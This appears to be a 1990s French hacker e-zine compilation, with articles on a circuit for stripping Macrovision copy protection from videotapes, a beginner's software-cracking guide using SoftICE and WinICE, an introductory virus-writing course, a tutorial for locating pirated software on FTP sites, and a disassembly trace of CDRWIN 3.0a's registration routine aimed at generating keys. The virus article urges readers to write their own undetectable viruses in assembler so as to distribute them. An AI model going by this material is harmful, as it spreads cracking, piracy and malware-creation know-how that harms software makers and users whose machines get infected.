SCART des 2 scopes,qui permet,tout simplement,d'effacer ce signal indesirable.
Ce petit circuit ne vous coteras gre plus de 300F et rend toute protection
infficace (la copie elle-mme peux ensuite tre recopie
l'infini sans ce
boitier). Ce circuit ce compose de quelque composants facile
trouver (
part 1 ou 2 un peu plus difficile),d'un circuit imprim double-faces
(dimension:75mm*67mm voir MVISION2.GIF
imprimer (scann a 200 dpi)).
Il possde une entre et une sortie SCART o il faudras y brancher
respectivement la sortie du scope lecteur et l'entre du scope enregistreur.
Pour savoir
quel fil correspond le signal entre ou sortie SCART,voici un
petit shma d'une fiche SCART (aussi appele fiche PERITEL):
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ\
³ 1 3 5 7 9 11 13 15 17 19 21 \
³ 2 4 6 8 10 12 14 16 18 20 \
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ\
Voil
,en gros ;-) une fiche PERITEL .
L'ENTRE SCART est la broche Nø20 et la SORTIE la Nø19
Pour alimenter ce circuit,il vous faudras 2 alimentations. L'une de 5 volts,
l'autre de 12 volts. La consomation du circuit ne doit gre depasser les
150 mA .Vos alims doivent tres stables et bien regules
Un conseil au cas ou vous auriez du mal
trouver un ou plusieurs composants
chez le cremier de votre ville : potassez les pubs des revues electronique
et commandez les en VPC (
Paris,y'a tout normalement !)
Liste des composants:
U1 : LM1881 Sync seperate
U2 : 74HC4538
U3 : 74HC02
U4 : 74HC4316 C1 : 1.5n Silver Mica
Q1 : 2N3904 C2 : 2.2n Silver Mica
R1 : 300 Kohms C3 : 4.7y Polyester (important !)
R2 : 390 Kohms C4 : 100n
R3 : 75 ohms C5 : 100n
R4 : 620 ohms C6 : 560p
R5 : 680 Kohms C7 : 47y
R6 : 1 Kohms C8 : 220p
R7 : 10 Kohms C9 : 100p
R8 : 10 Kohms C10 : 1000y
R9 : 120 ohms
Voil
que ce termine ce seul et unique article sur le faon de virer la
Macrovision des cassettes video. C'est vrais quoi ! dej
3 pages pour parler
de
,c'est plutot balaise,en fesant trainer le sujet et tout et tout ...
Si vous voulez un article plus long,moi je veux bien je peux vous parler
du chien de ma grand-mre qui est presque aussi malade quelle,ce qui est dej
tres grave,vu son etat. Si on fait rien,il va mourrir le pauvre ... A mon
avis,faudrais penser a la piquer, la grand-mre, sinon,il va pas survivre le
pauv' ptit toutou ...
Ok,OK ! j'arrete !!!
Et que cet article ne vous serve pas a copier les cassettes copyrightes !!!
MAD666
*******************************************************************************
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ Debuter en Crack ³
³ Dos ou Windows ? ³
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ par ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ ÀÄÄÄÄÄÄÄSaMSoNÄ[Mj13/Dsk]ÄÄÄÄÄÄÙ ³
³ ³
³ A tous les combattants de l'ombre ³
³ J'adresse un message d'espoir ³
³ Pour que leur Fronde ³
³ Se transforme un jour en victoire! ³
³ Molodoi. ³
³ ³
³ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³
³ ³ 1. Introduction ³ ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ 2. Les points communs ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
³ 3. Specificites Dos ³
³ 4. Specificites Windows ³
³ 5. Conclusion ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ 1. Introduction ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
On m'a souvent pose la question:"Pour debuter en crack, par quoi je dois
commencer: Dos ou Windaube ?". Et la, je me suis trouve tres con pour expli-
quer en deux mots ce que j'en pensait. Voila donc un petit article pour cla-
rifier les choses.
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ 2. Les points communs ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
Softice (debugger Dos) et Winice (debugger Win) ont le meme look, a deux
trois details pres, peu importants.
Softice est en mode 16 bits alors que Winice 95 est en mode 32 bits, ce
qui modifie un poil les mnemoniques, mais franchement, ca change pas grand
chose pour nous.
Le code source est toujours en Assembleur (Saint Langage qui en rebute
plus d'un :). Au niveau des instructions pour les debuggers, elles restent
souvent identiques en ce qui concerne les breakpoints, les editions de regi-
stres, la modification du code source, etc...
On retrouve encore le loader qui permet de debugger un soft des le debut
de son code source: Wldr sous Win et Ldr.exe pour Softice.
Une petites correspondance des principales touches de fonction Softice/Win-
ice:
Action Winice Softice
-------------------------------------------
Trace over F10 F8 (p)
Trace in F8 F7 (t)
Relance du soft F5 F9
jusqu'a BP
Changement F6 F12
Code/instructions
Voir ecran en F4 RS
cours
Avec Softice, vous pouvez reconfigurer les touches avec l'instruction FKEY.
sous Winice, j'ai pas verifie, mais ca doit etre possible.
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ 3. Specificites Dos ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
Un des principaux avantages de Softice, est qu'on peut faire un Breakpoint
"a la volee": un petit Ctrl-D et hop! directement dans le code source du
programme debugge a l'endroit ou il est rendu (pour Windows, voir 3). C'est
tres pratique: par exemple, on peut faire un BP juste avant la demande de
code pour pouvoir ensuite faire du pas a pas et mieux isoler la routine...
Une autre specificite DOS, c'est qu'on peut mettre des Breakpoints sur les
interruptions (BPINT) ce que l'on peux faire sous Win, mais qui me semble
inutile (euh, si je me trompe --> email!).
Passons aux problemes qui peuvent se poser sous Dos.
Vous avez cracke un soft, vous recherchez les chaines hexadecimales et
vous ne les trouvez dans aucun fichier! C'est probablement que le fichier
est compresse: le fichier se decompresse "en route" pour gagner de la place
et faire chier les crackers debutants. Il existe des compresseurs d'executa-
bles classiques: Lzexe, Pklite, Diet, etc... Dans ce cas la, il faut utili-
ser un decompresseur: UNP 4.11 (cardware) est celui que j'utilise le plus
because il reconnait un grand nombre de formats. MAIS cela ne marche pas
pour tous les softs. En effet, certaines boites utilisent une compression
"maison", qui n'est pas reconnue par Unp ou un autre du meme style. La, pas
de mystere, il faut utiliser un patch resident. Un resident, c'est un petit
programme qui se charge en memoire qui modifie le programme pendant son exe-
cution en memoire et qui permet de le patcher. Vous pouvez en faire vous me-
me en asm ou utiliser Spoke (freeware) qui est un residant configurable as-
sez efficace. Mais j'aborderai surement le cas des residents dans un pro-
chain article.
L'un des principaux emmmerdements sous Dos sont les programmes en mode pro
tege: les fameux DOS4GW et autres. Je ne suis pas un maitre de ces trucs,
mais en gros il permettent de faire un programme en 32 bits en s'affranchis-
sant des problemes de memoire specifiques au Dos (merci Billou!). Le proble-
me, c'est que Softice ne supporte pas du tout les programmes qui utilisent
le mode protege. Alors il faut utiliser Watcom Debugger pour les softs qui
utilisent le DOS4GW, et ce debugger, c'est pas un modele de puissance. Une
autre astuce consiste a passer par une session Dos de Windows95. La, c'est
un peu long a expliquer ici (surtout que je ne masterise pas du tout le
mode protege, je n'ai que quelques "astuces" :( ) J'essairai donc (ou un
autre membre, de vous donner quelques trucs dans un prochain article.
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ 4. Specificites Windows ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
La principale difficulte presentee par le debugging sous Windows, c'est la
pose des Breakpoints. Sous Dos, un Ctrl-D et vous etes dans le code source,
en direct. Sous Windows (3.x ou 95), quand vous faites un Ctrl-D, vous avez
1/13223145456677656^32 chance de vous retrouver a l'endroit ou vous voudriez
etre: a l'endroit precis du code source ou en est le programme a cracker.
Vous etes dans des putains de procedures Windows, a cause du multitache. Et
ca, ben c'est deroutant au depart.
Donc, la solution c'est de poser des Breakpoints sur des procedures Win u-
tilisees par le programme, le plus proche possible de l'endroit a debugger.
Par exemple, pour une boite de dialogue a supprimer, un "BPX DIALOGBOXPARAM"
peut s'averer pas mal. Pour une "messagebox", un petit "BPX MESSAGEBOX" a
des chances de vous aider. Et il y en a une sacree tripotee de fonctions
Windows!
Une autre solution, c'est de debugger le programme a partir du debut avec
Wldr si le soft a deplomber s'y prette (boite de dialogue au lancement).
Mais ces fonctions de Windows ont un avantage: elles simplifient le code
source du programme, ce qui fait que tres souvent, les procedures d'enregis-
trement, sans etre identiques, se ressemblent (mais vous inquietez pas, sous
Windows aussi, y'a des programmeurs vicieux). Cela permet surtout d'acquerir
certains reflexes en voyant des suites d'instructions qui sautent aux yeux
une fois qu'on a un peu d'experience.
Ah, oui, j'oubliais: pas la peine d'essayer de cracker des softs program-
mes avec Visual Basic avec Winice. Vous pouvez reconnaitre ces softs parce
qu'ils demandent les dll Vbrun100, Vbrun200,etc... En effet, les fichiers
.exe de ces softs ne sont que des appels aux fonctions contenues dans les
DLL si bien que vous vous retrouvez dans des boucles a la con en permanence.
La seule solution qu'il y ait a ma connaissance soit un decompilateur speci-
fique aux progammes Visual Basic, mais je n'ai pas approfondi. Mais ne vous
inquietez pas: 999/100, les programmes Visual Basic, c'est de la daube :).
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ 5. Conclusion ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
Une conclusion? Merde, qu'est ce que je vais bien pouvoir leur dire ???
Ce article etait surtout fait pour donner une idee generale de la difference
entre debugger sous Dos et sous Windows. Bien que Windows puisse faire peur
au depart, c'est a mon avis injustifie. Il faut s'y faire au depart, mais ca
reste assez logique dans l'ensemble et pas forcement plus dur a debugger que
sous DOS ou il n'y a pas deux programmes qui se ressemblent. A part ca, ben,
comme d'habitude: accrochez vous! Moi il m'a quand meme fallu pas mal de
temps pour faire mon premier crack a peu pres propre.
Pour me contacter, voyez mon autre article.
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ Samson [Mj13/Dsk] ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ Initiation au VIRUS, cours 1 ³
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ par ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÀÄÄ<< :)---> UnK MnemoniK :)>ÄÄÙ
)> Quelques notions de base
---------------------------
Avant toutes diffusions de parties ou de sources de virus , j'ai tenu a
mettre deux trois choses au point
1> Qu'est-ce qu'un virus ???
<< Ohhh mon dieux >>, c'est ce que j'ai entendu depuis que j'en fais ,
cependant un virus ne signifie pas la mort du systeme ,
ni le chaos total du diskque dur (ni la perte de la fat )
Les virus sont a la base des simples programmes mignon tout plein,
s'auto-copiant sans avertir l'utilisateur , comme une bacille ,
son but principal est de se reproduire une fois ce but atteint ,
le virus fera quelques actions au bon vouloir du programmeur qui
l'as conus.
types de virii : j'en ai class (:Virii , pluriel de virus)
1) Les recover-virus : ces virus ont pour originalite d'tre trs
petit mais aussi trs cons car ils rcrivent leurs codes sur les
progs sans tenir compte du programme lui meme , ca tourne tout le
temp au plantage royal et l'user vas donc lancer l'a-v , le plus
c'est que le programme infect est irrcuprable
2) Les rsidents : ce sont les plus beau a mon avis , ce sont des
programmes qui peuvent agir en arrire plan , ils sont lanc a
partir d'un virus executable , une fois en mmoire , le virus peut
se copier a son gr tenant tout de fois compte de ne pas gner
l'user,ce qui rend ces virus extremement contagieux ,imaginez vous
entrain de faire un dir , la , innocamment , le virus vient
d'infect 3 nouveaux fichiers , au bout de 10 minutes passe sous
dos , un disque peut etre TOTALEMENT infect sans que l'user ne
s'apercoive de quoiquesesoit.
3) Les infecteurs d'executable :ces virus s'attachent au programme
lui meme , ils se copient et puis repasse le controle au programme
dmand , mode de propagation trs rpendu car assez facile a
rlaiser .
4) les infecteur du boot :ces virus s'cutent au lancement du boot
ce mode de propagation est assez intrssant du fait qu'il n'est
pas drang par le systeme d'exploitation , donc il infectera un
systeme unix aussi bien qu'un system os/2 aussi bien qu'un systeme
dos.
5) Divers : Toute une rimbabelle de virus se sont spcialiss dans
divers style , par exemple des virus infecte des fichiers doc
(comment ??? : simple , les fichiers doc contiennent des progs ,
car on peut attacher des progs a un doc grace aux ole , je salue
celui qui en a eu l'ide ) , ya aussi les vers , virus qui se
balladent dans les rseaux , des infecteurs de fichiers OBJ,Sys...
2> Creer ses virus
pourquoi creer son virus ??? Les virus que vous pourrez trouver seront
dtctable , bref > ca termine en couille . Les virus cr par des
gnrateurs sont tous reconnus et meme leur variente , bref > ca sert
a rien je voudis. Le seul moyen de distribuer un virus est de le creer
soi meme ;
-Oui mais comment on fait ?( avec la voix naze )
Il faut les programmers en assembleur
-Oui mais moi je connais que le basic
c'est con ca car pour pouvoir faire un virus dans des conditions
acceptable, il faut un language de trs bas niveau , l'assembleur
s'impose , les autres languages genre deplhi , pascal ,... ne sont pas
dutout adapt a ce genre de manipulation ,ceci dit j'en ai deja vu en C
et en C assembleur mais trs rares sont-ils.
-Ok , l'assembleur ca se mange comment ?
L'A86 est un compilateur shareware , mais il est trs peu utilis dans les
virii qui sont le plus souvent compil en TASM (<^ý=- WaReZ oblige -=ý^>)
-C'est dur a faire ?
Non c'est pas dur , bien sur , vous ne ferez pas des gros masterboot tout
de suite , je vous montrerais des Executables et chaque fois une nouvote
pour l'amliorer , des routines intrssente , etcetc
-Et si je veux le tester mes virus ???
faites le sur des bornes isoles , le vieux 286 du grenier avec son disque
de 40 megs fera l'affaire , de cette manire , vous pourrez toujours
controler votre virus (comme dans les films , 1 virus lach dans la nature
si il est trs contagieux sera totallement incontrolable )
Tips: - J'utilise le norton commander du dos, ca facilite bocoup l'dition
de ces virus , - lisez les issues 1-14 de 40Hex et ceux de VLAD , ils sont
trs pointus sur les nouvelles manires d'infections mais ils fournissent
les codes Hexa et assembleur de virus (: , In Inglich ,,, - vous pouvez
toujours reprendre des sous-fonctions pour autant que celle ci ne soient
dans les premiers octets du virus car ceux-ci sont utiliss pour la
dsinfection .
About Me
--------
Je traine souvent sur le net , si vous etes sur aol , lancez un mssage
clair
VGeNeRaLV , sinon je passe mon temp sur kali a jouer sous le nom de
General3 , je suis parfois sur l'IRC mais trs rarement , sur L'udernet .
Mail me at : zorohack@hotmail.com
DdiKaCEs: Faucon , Uther , Stork , Aries , Fade , Knuck , Till , Flavor ,
Lithium , SoS , Arnold , JAYCEuWZ , HxMajor , WzEuRoPe , Jayce , Yak ,
HuMaNBOmb ,
Magic , Pablo , Zak , Znel , Marave , Mana , Cybertech et toute la clique
Prochain episode : un recover-virus comme il faut
<< :)---> UnK MnemoniK :)>
*******************************************************************************
Comment dbusquer les warez sur le net en 10 leons
Ecrit-a-la-va-vite-parce-que-j'ai-pas-le-temps.
par
Shybe
************************************* ************************************
Je vais donc noncer dans ce document les methodes les plus connues
pour trouver facilement ce qui est le plus croustillant pour nous: les warez.
1) Introduction:
Il n'y a pas si longtemps, Internet tait un rseau rserv aux
professionnels. On ne trouvait pratiquement que des donnes
scientifiques.
De nos jours toutes sortes de bidochons se baladent sur le Web et
Internet est en train de devenir un merveilleux foutoir ou l'on trouve
pratiquement ce qu'on veut. Le probleme est de savoir OU trouver ce qui nous
interesse.
D'abord un peu de vocabulaire pour les dbutants:
-Warez: Terme dsignant un logiciel croustillant. C'est
dire
sympa, cool, interessant, registered, pompable, jouable et nouveau.
-Appz, Gamez, Sitez: termes dsignants respectivement: Applications
warez, Jeux warez, Sites FTP warez
(ne riez pas y'en a qui ne comprenent pas bien l'anglais.)
-Oldiez ou Oldies: Gnralement les vieux jeux et applications.
-"This site sucks!": "Ce site suce!" ou "ce site est nul!"
gneralement crit par quelqu'un qui vient de fouiller
sur un site FTP sois-disant warez et qu'en fait le site
est vide ou ne contient que des oldiez ou des merdes.
Si vous voyez ca dans un site FTP warez, il y a fort
a parier que le site ne vaut pas un clou.
-"Fuck U lamerz!": "Allez vous faire enculer, bande de morveux!"
Ou plus exactement un message d'injure d'un Elite
(vois plus loin) qui grogne parce qu'il n'a pas
trouv son bonheur dans un site FTP dit warez.
-"Empty site!": Site vide. Ne contient rien ou que des merdes.
-"Loaded site!": "Site rempli!"
Dit d'un site lorsqu'il contient des warez.
-"Fat ass site!": "Site warez gros cul!" ou "site 'poid-lourd!'"
En gros: YA BON. Terme gnralement utilis par unElite
qui a trouv un site FTP warez fantastiquement bourr
de warez. Donc a essayer en premier.
La socit sur le net par ordre croissant d'importance:
-Lamerz: On est dit lamer lorsqu'on pompe par exemple impunment 20 mo
de warez sur un site FTP sans envoyer quoi que ce soit.
Sur le net, tout le monde traite tout le monde de lamer.
C'est en fait une espece de coutume.
Un lamer est en fait un synonime pjoratif de "dbutant".
-Trader: Un gars appartenant a un "groupe de warez" (distributeur de warez
payant ou pas) qui est charg de vendre ou d'changer les warez.
Les traders sont en gnral considrs de haut par les "lites"
(voir ci-dessous) car ils se tapent le sale boulot.
Ce sont en fait des "dealers" de warez.
-Elite: Un bien grand mot pour dsigner les pros, la "haute socit" de la
micro dans les coders, crackers et autres
hackers. On est generalement dit lite lorsqu'on fait partie d'un
groupe de traders. Les gars qui se disent lite sont dans 90% des cas
des craneurs qui aiment dire "j'ai des warez et j'en ai autant que
j'en veux." dans les newgroups.
Remarque importante: Les 10% de vrai "membres lite" ne parlent
JAMAIS d'eux et ne se font pas remarquer.
--> Dans la pratique, un lite est un type capable de dbusquer SOIS-MEME ses
warez sans tre oblig de pleurer dans les chaussettes d'un autre type
qui, lui, le peut. (Ce que nous avons tous fait dans nos dbuts)
Nous dsigneront donc courrament un lite un gars qui cherche des warez.
II Methodes de recherche:
1) FTPsearch 3.3:
-----------------
Lorsque j'ai commenc a cherche des warez sur le net, j'ai d'abord utilis
les moteurs de recherches connus (Alta-vista, Yahoo...). Je me suis vite
rendu compte qu'il existait des milliers de sites WWW contenant des listes
de sites FTP warez. Malheureusement, je me suis aussi vite rendu compte que
beaucoup n'tait pas
jour, ou que les FTP ne marchaient plus.
Il m'a donc fallu chercher d'autres moyens de trouver des sites frais.
Un jour j'ai entendu parler de FTP-Search 3.3. (ftpsearh.ntnu.no)
FTP-Search est surement le moteur de recherche de FTP le plus puissant
sur le net: Il suffit de chercher un mot clef, et s'il trouve ce mot
DANS L'ADDRESSE d'un site rpertori, hop on a la rponse.
Il est donc facile, en thorie de trouver des sites warez! Il suffirait
de chercher des noms de repertoires se trouvant courrament dans les sites
pour tomber sur les warez. Le seul probleme, et de taille, c'est que
FTPsearch garde souvent en liste des sites prims. On a donc souvent
l'IMPRESSION trompeuse d'avoir trouv LE site qui booste et qui tue,
mais en fait si on veut pomper, ou mme simplement acceder REELLEMENT au site
(avec un client FTP), eh ben a marche presque jamais!
(comme par exemple ftp.gpl.net, un site qui A existe il y a quelque temps,
et qui contenait un gros morceau, mais qui a malheureusement ferm!)
FTPsearch garde en memoire le contenu des sites A UN MOMENT DONNE, ce qui
fausse completement l'ide qu'on peut avoir de son vritable contenu!
(Voir des fichiers qui n'existent plus depuis longtemps, ou encore
ne pas voir des fichiers qui viennent d'apparatre!)
IL EST DONC IMPERATIF, AVANT TOUT EXCITATION SOUDAINE, de VERIFIER
l'tat du site: en pratique cliquer sur l'addresse complete en bleu dans
FTPsearch.
(avec netscape ou explorer)
Si le site ne rpond pas, c'est rap. S'il rpond, vous pouvez commencer
en pisser de joie.
Pour une recherche aise, il faut savoir bien configurer FTPsearch:
1) Passer en mode "expression match"
(donne une simple liste contenant uniquement les mots-cle se rapprochant
le plus du votre, pratique pour trier rapido)
2) Rgler l'ordre d'affichage de faon
avoir la taille VISIBLE (en premier
par exemple. C'est important: ca permet de trier rapidement les fichiers
en fonction de leur taille: si vous trouver un "quakefull.zip" qui fait
3 ko par exemple, on peut tre sur que a n'est pas la commerciale!
3) Rgler l'ordre d'affichage sur "date, host and name" de faon a avoir
les sites les plus rcents (et donc les plus susceptible de contenir
quelque-chose) en HAUT de la liste.
4) SAUVEGARDER LA CONFIG! (sinon rebelotte, et c'est chiant a la longue)
--> Je vais maintenant faire une liste non exaustive des mots clefs les
plus
utiliss dans les sites, ou dans les noms de rpertoires:
( "_" dsigne un ESPACE )
.wrz
wrz
.apz
apz
.warez
warez
.appz
appz
.gamez
gamez
.sitez
sitez
.oldiez
oldiez
.reqz
reqz ou reqs ou required
serialz
crackz
stuffes ou stuffz
iRC )
iRC96 ) ou .iRC???
iRC'96 )
.nwc ou .NwC ou NwC etc...
fate96
risc
...
_.
_..
_...
etc...
Il est aussi intelligent de chercher:
uploaded by
upload by
upped by (le plus courrant)
up by
reqz filled by
filled by
Ou pour des warez amiga:
------
amiga-warez
amiwarez
.amiwrz
amiwrz
aaa
a-warez
Regardez dans les rpertoires:
.unreadable
unreadable
test (je sais y'en a beaucoup, mais ca vaut le coup!)
.temp
temp
--> Les groupes de warez: nous recherchons ici les fichiers communs
acompagnant les warez en gnral:
fate.nfo | irc96.nfo
fate96.nfo | razor.nfo
ror.nfo | risc.nfo
dod.nfo | tdu.nfo
ucf.nfo | tdujam.nfo
ucf.com /.exe | tdujam.exe
--> Les extensions de fichiers:
.arj / .a01 etc...
.r00 / .r01 etc...
.000 / .001 (TDUjam)
.dms (pour les warez amiga)
.lzx (idem)
--> Les enttes de fichiers: (
coupler avec les extensions )
tdu-*.*
tdu*.*
ror*.*
dod-*.*
dod*.*
rsc*.*
*ucf.*
Le mieux est de chercher des noms de fichiers appartenant a des warez
connues et rpandues, par exemple:
dn3d.*
dn3d13r.*
duke3d.*
duke3dr.*
quake101.zip ou arj/a01 etc...
quakefull.*
z.arj
psp40.arj ou zip
psp311r.*
gw32r.zip (game wizard 32 :)) )
photoshop.*
Pour les amigafans:
tvpaint*.lzx
dpaintV.lzx
dc-*.*
et dc-lw4.* ou dc-lw5c.* (lighwave 4 ou 5 bc)
real3d.*
etc etc...
Faites jouer votre imagination!
Essayez aussi, si vous cherchez quelque chose de prci, de combiner
enttes et abrgs, par exemple:
Je cherche Speedy Rom.
Dans ce cas on cherche un peu partout et on trouve dodsprom.zip...
Remarque: les caractres tels que '*' ou '?' ne sont pas reconnus par
FTPsearch. Pour utiliser les notations tendues, vous serez
oblig d'utiliser la "Regular syntax" qui est diffrente
de celle utilise par DOS.
Exemples de conversion:
? <=3D=3D> .
* <=3D=3D> .*
Vous trouverez un rsum complet de la syntaxe dans l'aide au site
de FTPsearch, ou en cliquant sur "syntax" qui est en
surbrillance si mes souvenirs sont bons.
Bon avec a vous devriez pouvoir trouver
peu prs 1 site warez par jour!
2) Les listes de sites:
-----------------------
Il est assez facile de trouver des listes de sites warez dans les
rpertoires
"sitez" des sites warez dja trouvs. Le probleme, toujours le mme:
les mises
jours. Les sites warez ne durant gnralement pas longtemps
(1 a 2 jours pour les warez PC et une a deux semaines pour les warez
AMIGA)
il est impratif de trouver des listes contenant des sites datant du jour
mme. Pour cela: trois solutions:
1) De loin la plus facile:
Aller sur mon site, dans mes linkz, et fouiller dans la section
"warez FTP listz". Vous trouverez surement 2 ou 3 sites contenant
des listes de FTP classs par date.
(certains sont mme mis-a-jour 2 ou 3 fois par jour!!!)
Par exemple: www.netwarez.com, section WAREZ.
(excellent, ce site, d'ailleur)
2) Chercher avec FTPsearch ou autre moteur de recherche des fichiers
genre...
0-day.txt
0day.txt
0daywrz.txt
0.day
0day.wrz
etc...
ou:
siteZ.*
sitelist.*
sitezlst.* (extensions txt/doc/nfo etc...)
...ou mme des fichiers comme WS_FTP.INI qui contiennent des listes
de sites compatibles avec Ws_ftp.
Si WS_FTP.INI se trouve dans un rpertoire zarbi genre _.. ou sitez,
pas de doute!
3) Ce qu'on appelle dans notre jargon "trader en IRC"
C'est-a-dire changer des listes de sites contre d'autres listes,
ou des warez.
Par exemple dans les channels comme #warez666 chez undernet.org,
on peut souvent trouver des addresses IP de sites appartenant a des
particuliers... Vous lui envoyez quelque-chose qu'il cherche
et il vous file l'acces...
III La machine infernale:
Comme vous avez pu le voir, lorsqu'on trouve un site warez, on trouve aussi
de temps en tmeps des listes d'autres
sites FTP. Il est donc assez facide
de maintenir quelques sites toujours
dispo pour trouver ce qu'on veut.
Le mot de la fin:
J'espere qu'avec tous ces trucs vous trouverez votre bonheur...
Cependant n'oubliez pas que vous n'=tes pas seul a pomper sur un site
FTP, pensez aux autres: remplissez les "reqz". Perso, je laisse un repertoire
genre Upped by -=3D Shybe =3D- shybe@geocities.com.
Comme a il arrive qu'on se fasse des potes sur un site, et qu'on
change des listes etc...
A vos modems
Amicalement
-=3D S H Y B E =3D-
NB: Dsol pour l'aurtaugraf.
*******************************************************************************
| TRACAGE DE CRWIN3.0a |
| CREATION DE REGISTER |
| PAR |
| DONGLE KILLER |
| ALLIGATOR427 |
******************************************************************************
Voici donc le tracage de CDRWIN 3.0a, qui vous permets de trouver les BPX
du premier coup...
le calcul restera le meme sur toutes les versions suivantes, vous permettant
d'avoir votre registrer... sorry Jeff...
Nous l'avons trac tous les 2, a des moments et endroits differents...
rendons ces lauriers a cesar, qui a pouss le "vice" en creeant un KEY-REGIS.
Bravo DONGLE!!!
******************************************************************************
0137:00406345 CALL 0043789D
Renvoie eax=3Dlongueur du nom
0137:00406354 CALL 0043789D
Renvoie eax=3Dlongueur email
0137:00406363 CALL 0043789D
Renvoie eax=3Dlongueur code
0137:0040636C CALL 00424960
Renvoie eax=3Dvaleur hexa du code
0137:00406378 PUSH EAX
Sauvegarde de la valeur du code
en pile
0137:00406381 CALL 00411E10
Vrification du code
Dtail de la vrif. :
0137:00411E22 CALL 00412150
Vrification si code ok,
alors eax<>0
--------------------------------------------------------
Dtail du CALL 00412150
les adresses du nom, email et code ont t empile juste
avant l'appel!!
0137:00412150 MOV EDX,[ESP+04]
EDX pointe sur le NOM
0137:00412160 REPNZ SCASB
On recherche la fin de chaine
NOT ECX
DEC ECX
ECX=3DLongueur du nom
CMP ECX,06
Longueur infrieure =
6 caracs ?
0137:0041216A MOV EBX,[ESp+14]
EBX pointe sur l'email
....idem : vrif longueur....
--------------------------------------------------------
0137:00412183 PUSH EDX
On empile l'adresse du nom
CALL 004121E0
Calcule un code un partir du nom
nom= Vous choisirez..
eax=xxxxxxxxxxx
....
....
PUSH EBX
on empile l'adresse de l'email
OR EDI,ESI
Inversion de la partie haute=20
et de la partie basse de eax
par rotations et addition finale
Rsultat dans ESI !!!
0137:0041219B CALL 004121E0
Calcule un code
partir de l'email
(grace a l'adresse empile avant)
email= vous choissirez!
eax=xxxxxxxxxx
XOR EDI,EAX
OU EXCLUSIF des 2 rsulats nom et
email
EDI=xxxxxxxxxx
en base 10
EDI=xxxxxxxxxxx < le code est la!!!!
La suite rcupre la valeur du code saisi qui avait t empile
bien avant et la compare a la valeur ci-dessus.
--------------------------------------------------------
#
Routine calcul register :
....dtails oublis....
EBX pointe sur la chaine
ECX =3D longueur chaine
DI =3D longueur chaine
0137:00419199 XOR EDX,EDX
EDX=3D0=20
0137:0041919B MOV DL,[EBX]=09
Lecture premier carac.
exemple : DL=3D50 carac. 'P'
INC EBX
Pointe sur carac. suivant
MOV ECX,EDX
SHR EDX,02
2 dcalages
droite sur EDX
0101 0000 --> 0001 0100 =3D 14
XOR ECX,EAX
OU exclusif entre eax et ecx
dans ecx.=20
SHR EAX,04
4 dcalages
droite de eax
AND ECX,0F
Et logique sur ECX, on garde les
4 bits de poids faible
MOV ECX,[ECX*4+ESI]
XOR ECX,EAX
Ou exclusif entre ecx et eax
LEA EAX,[EXCX*4+0000000]
EAX=3DECX*4
SHR ECX,04
4 dcalages
droite de ecx
XOR EAX,EDX
Ou exclusif entre ecx et edx
AND EAX,3C
ET logique sur eax
bits 5,4,3,2 conservs
MOV EAX,[ESI+EAX]
